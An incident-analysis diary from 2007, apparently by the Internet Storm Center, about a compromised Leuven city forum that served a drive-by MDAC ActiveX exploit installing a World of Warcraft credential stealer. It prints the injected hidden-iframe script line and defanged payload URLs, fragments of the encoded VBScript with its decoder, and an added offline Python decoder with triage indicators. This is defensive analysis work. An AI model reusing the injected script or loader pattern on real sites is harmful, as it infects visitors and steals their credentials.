Note: please tread carefully here. While we've obfuscated all malicious links, some of them are still live on the internet. Over the weekend we have been working with anti-virus vendors as well as the regional CERT team to have the issue resolved, but we haven't been quite as successful as we had hoped. This attack doesn't merely apply to the site mentioned, but spreads out over hundreds of compromised sites, so you may want to filter the malicious URL mentioned.
At least if you believe everything your neighborhood webmaster tells you... Early last week, the forum of the website of Leuven, a major student town in Belgium, got compromised. National press reported the compromise occurred through so-called SQL infection (sic), after which links to a .cn web server were added. In an interview, an IT representative of the local government stated that the "hack was not malicious. No data on the website was removed, altered or stolen".
Reason enough for the Internet Storm Center to have a second look. Apparently several pages on the forum were altered to contain a script tag to:
hxxp://www xvgaoke.cn /ms/ltxs.js
document.write("<ifra me width='0' height='0' src='hxxp ://www xvgaoke. cn/ms/ltxs.htm'></ifra me>");
The resulting page contains a piece of VBScript (reduced in size below for brevity), a hyperlink to Google and a counter hosted on a Chinese web server.
abc = "006F006E0020006500720072006F0072...65006E0022002C0030000D000A"
cde = "006F006E0020006500720072006F007...00065006E0022002C0030000D000A"
' Decoder: every group of four hex digits is one UTF-16 code unit; a 0D0A group becomes a line break
Function decode(x)
  For i = 1 To Len(x) Step 4
    If Mid(x, i, 4) = "0D0A" Then
      decode = decode & vbCrLf
    Else
      decode = decode & Chr(Int("&H" & Mid(x, i, 4)))
    End If
  Next
End Function
Naturally, we want to have a look at what this code does. It's easy to execute VBScripts on the desktop using the Windows Script Host, or WSH, and its tool wscript. The content can just be copied into a .vbs file and executed. However, that's not what we want to do here, since the decoded content is handed to EXECUTE, which would run it. Not a good idea.
So, let's change these commands around a bit. Wscript provides a method, WScript.Echo, that displays content on the screen in a message box instead of running it:
Executing the modified script through wscript then yields some more VBScript, which includes the following code:
on error resume next
MircoLong="hxxp:// www xvgaoke. cn/ms/ltxs.vbs"
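The same decode step, done offline so the decoded layer is inspected rather than executed, as an added example that is not code from the diary or from the malicious script. It mirrors the loop above (four hex digits per UTF-16 code unit, a 0D0A group emitted as CRLF) and flags the strings an analyst would look for in the result; the SAMPLE blob and the indicator list are constructed for this example.

```python
"""Offline decoder for the hex-encoded VBScript layer discussed above.
Added example: decodes the 4-hex-digits-per-character scheme and triages
the result without ever executing it."""
import re

# Constructed sample (not the live payload): encodes
# "on error resume next\r\nExecute(cde)\r\n" in the same 4-hex-digit scheme.
SAMPLE = (
    "006F006E0020006500720072006F0072"          # on error
    "00200072006500730075006D0065"              #  resume
    "0020006E006500780074"                      #  next
    "000D000A"                                  # CRLF
    "004500780065006300750074006500280063006400650029"  # Execute(cde)
    "000D000A"                                  # CRLF
)

# Strings whose presence in a decoded layer is worth flagging (assumed list).
INDICATORS = {
    "Execute": "decoded text is run as code: expect another layer",
    "CreateObject": "COM/ActiveX object instantiated",
    "BD96C556-65A3-11D0-983A-00C04FC29E36": "MDAC ActiveX CLSID from the diary",
    ".exe": "dropped-binary reference",
}

def decode_hex_script(blob: str) -> str:
    """Mirror of the script's decode loop; raises on malformed input."""
    if len(blob) % 4 or not re.fullmatch(r"[0-9A-Fa-f]*", blob):
        raise ValueError("expected whole groups of four hex digits")
    out = []
    for i in range(0, len(blob), 4):
        group = blob[i:i + 4]
        if group.upper() == "0D0A":   # the script's explicit line-break case
            out.append("\r\n")
        else:
            out.append(chr(int(group, 16)))
    return "".join(out)

def triage(decoded: str) -> dict:
    """Return {indicator: note} for every indicator present, plus any URLs."""
    hits = {k: v for k, v in INDICATORS.items() if k.lower() in decoded.lower()}
    for url in re.findall(r"h(?:xx|tt)ps?://\S+", decoded, flags=re.I):
        hits[url] = "embedded URL (defanged hxxp form is matched too)"
    return hits

if __name__ == "__main__":
    layer = decode_hex_script(SAMPLE)
    print(layer)
    for k, v in triage(layer).items():
        print(f"[!] {k}: {v}")
```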
We can see a reference to BD96C556-65A3-11D0-983A-00C04FC29E36. This is the CLSID of a Microsoft Data Access Components (MDAC) control. On April 12th, 2006, a Microsoft advisory reported on a significant vulnerability in an ActiveX control that is part of ActiveX Data Objects (ADO), the control referenced in the exploit code above. Even today, this vulnerability is commonly exploited as part of so-called drive-by exploits.
Without being noticed, the code then downloads ltts.exe from the same server and executes it on the victim system. On August 25th, the malware had a SHA1 hash of c1cbee89ba1033b8e739067eab086f70b476c5aa and was about 50 KB in size. Five days after the compromise took place, the binary was detected by 9 out of 32 anti-virus solutions. Note that it's quite common for people running such malicious web servers to change their malcode every so often, so as to reduce the risk of detection by anti-virus.
Once run on a system, the software drops a number of executables and installs one of them as the Userinit value under the Winlogon registry key, so it is started at every logon. This makes for one of those pesky, difficult-to-remove pieces of spyware. In the end, its final goal appears to be the gathering of World of Warcraft authentication credentials.
If you're still wondering why these are so prized, run this small Google query. On-line games such as WoW have recently begun to implement the concept of Real Money Transactions - yes, real money that you can lose by getting compromised and that others can gain.
So this leaves me wondering why exactly this was a non-malicious compromise?
Aug 28th 2007